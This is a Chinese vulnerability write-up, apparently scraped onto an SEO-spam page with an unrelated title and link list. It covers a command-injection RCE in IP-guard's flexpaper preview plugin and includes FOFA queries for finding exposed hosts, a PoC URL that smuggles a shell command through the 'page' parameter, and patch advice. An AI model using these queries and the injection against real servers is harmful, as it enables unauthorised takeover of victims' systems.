当前位置: 首页 > news >正文

苏州做网站推广的公司律所网站方案

苏州做网站推广的公司,律所网站方案,网站做中英文切换,网站建设全域云简介 IP-guard是一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。在旧版本申请审批的文件预览功能用到了一个开源的插件 flexpaper,使用的这个插件版本存在远程命令执行漏洞,攻击者可利用该漏…

简介

IP-guard是一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。在旧版本申请审批的文件预览功能用到了一个开源的插件 flexpaper,使用的这个插件版本存在远程命令执行漏洞,攻击者可利用该漏洞执行任意命令,获取服务器控制权限。

影响版本:IP-guard<4.81.0307.0

漏洞复现

FOFA语法:
app="IP-guard"
或者
web.title="IP-guard"

访问页面如下所示:

POC:

/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+test+>test.txt

拼接URL进行get请求:

http://ip:port/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+test+>test.txt

从浏览器访问后会直接下载一个文件证明请求成功

访问POC:/ipg/static/appr/lib/flexpaper/php/test.txt

成功执行写入的命令

攻击者可以利用漏洞获取对服务器的控制权

修复建议

1、产品升级方案
官方已发布新版本修复漏洞,建议尽快访问官网(https://www.ip-guard.net/)或联系官方售后支持获取版本升级安装包或补丁,升级至4.81.0307.0及以上。
2、临时缓解措施

  1. 配置入侵检测系统(IDS)和入侵防御系统(IPS)以及Web应用防火墙(WAF),以识别和阻止这类特征的请求,从而保护系统免受此类远程命令执行攻击的影响;同时为了避免攻击者绕过安全设备实施攻击,建议尽快修复漏洞。
  2. 如非必要,不要将 IP-guard 放置在公网上。或通过网络ACL策略限制访问来源,例如只允许来自特定IP地址或地址段的访问请求。

免责声明

文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!!!


结语

没有人规定,一朵花一定要成长为向日葵或者玫瑰。

http://www.yayakq.cn/news/831951/

相关文章:

  • 专业的基础微网站开发个人网站命名 备案
  • 大良营销网站公司高安网站设计
  • 一个数据库怎么做二个网站河北网站备案系统
  • 做网站工作图沈阳网站建设专家
  • 莱州网站定制网站建设厂家
  • 网站建设将来有什么发展石家庄网站建设浩森宇特
  • 广州建设工程造价管理网站劳务公司网站建设
  • asp 网站商场设计案例分析
  • 网站营销方式有哪些内容哈尔滨建站模板展示
  • 怎么做非法网站步骤1
  • 无锡做网站哪个公司好成都房产网安居客
  • 国家商标查询官方网站常见的网站类型
  • 人和机械网站建设wordpress用什么服务器
  • 专门做网站的app运营网站是什么意思
  • 十堰网站建设培训专注做一家男生最爱的网站
  • 家具网站设计网社区门户网站规范化建设
  • 旅游区网站建设html网页制作自我介绍
  • it教育网站建设今天新闻摘抄十条
  • 明星 卡片网站该怎么做wordpress 中文主题
  • 网站列表效果wordpress主题不显示菜单
  • 网站开发进度设计与阶段目标开发公司只给开具收据不能认定合同有效案例
  • 外贸网站怎么做促销网站一般字体
  • 网站开发德菁大理建设学校官方网站
  • 芷江建设工程招投标网站html代码hr表示
  • 企业建设网站的方式网站建设公司合同模板下载
  • 怎么做网站切图把网站打包微信小程序
  • app门户网站自考网站建设与管理资料
  • 换空间网站备案网站开发是前端还是
  • 上传网站到空间未备案网站 赚钱
  • 网站开发毕设需求分析厦门专业制作网站